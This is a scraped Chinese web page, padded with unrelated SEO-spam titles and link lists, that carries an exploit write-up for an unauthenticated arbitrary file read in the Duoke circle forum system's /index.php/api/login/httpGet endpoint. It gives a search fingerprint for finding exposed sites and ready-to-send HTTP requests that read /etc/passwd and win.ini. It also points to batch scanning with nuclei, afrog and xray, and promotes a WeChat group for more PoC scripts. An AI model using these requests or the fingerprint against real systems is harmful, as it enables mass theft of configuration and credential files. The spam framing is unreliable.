当前位置: 首页 > news >正文

uzi粉丝做的网站wordpress 读书主题

uzi粉丝做的网站,wordpress 读书主题,wordpress注册新用户,成都网站建设赢展0x01 产品简介 多客圈子论坛系统是一种面向特定人群或特定话题的社交网络,它提供了用户之间交流、分享、讨论的平台。在这个系统中,用户可以创建、加入不同的圈子,圈子可以是基于兴趣、地域、职业等不同主题的。用户可以在圈子中发帖、评论、…

0x01 产品简介

多客圈子论坛系统是一种面向特定人群或特定话题的社交网络,它提供了用户之间交流、分享、讨论的平台。在这个系统中,用户可以创建、加入不同的圈子,圈子可以是基于兴趣、地域、职业等不同主题的。用户可以在圈子中发帖、评论、点赞等互动。社交圈子论坛系统除了提供基本的社交功能外,还可以根据用户行为和兴趣为用户推荐相关内容。

0x02 漏洞概述

多客圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件等),导致网站处于极度不安全状态。

0x03 搜索引擎

body="/static/index/js/jweixin-1.2.0.js"

在这里插入图片描述

0x04 漏洞复现

linux

GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

在这里插入图片描述

windows

GET /index.php/api/login/httpGet?url=file://C:/windows/win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

http://www.yayakq.cn/news/825611/

相关文章:

  • 使用门户网站网络推广方法wordpress the7使用教程
  • 中国建设银行官网站e路通下载网页登陆界面怎么做
  • 高端网站建设的公司网站的建设需要多少
  • 阿里云做网站需要环境网页设计员的工作内容
  • 做推广的免费的济宁网站有哪些上海百度搜索优化
  • 简历网站推荐一二三四高清视频免费观看
  • 云南网站建设是什么南昌网站推广公司
  • 做的视频传到哪个网站好代理网店收费
  • 阿里巴巴网站建设规划简约的网页设计
  • 上海企乐网站制作公司住建局主要负责什么
  • 网站地图如何制作wordpress网站打开满
  • 网站快速搭建平台高清短视频素材库无水印
  • 体育局网站建设建网站岑溪哪家强?
  • 网站建设资料准备新闻软文广告
  • 中企动力网站建设方案济南网站制作*推搜点
  • 网站开发播放大视频卡顿有哪些html5制作的网站
  • 免费网站建设多少钱网站建设的要点是什么意思
  • 网站建设的目入图片凡科网免费网站域名注册
  • .net做的网站怎么样免费企业邮箱如何申请注册
  • 服务器和网站维护报告格式
  • 政务大厅网站建设管理制度佛山模板建站哪家好
  • 佛山网站建设方案咨询sharepoint网页制作教程
  • 保定建站价格word如何做网站链接
  • 做代码和网站相册制作模板
  • 做网站seo怎么赚钱计算机网络技术毕业设计
  • seo网站图片优化wordpress 后端是什么
  • dede网站模板页在什么文件夹在线制作横幅
  • 不收费的网站html做音乐网站
  • 做网站的天空网网站开发html5技术
  • 山东济南网站制作WordPress维护模式退出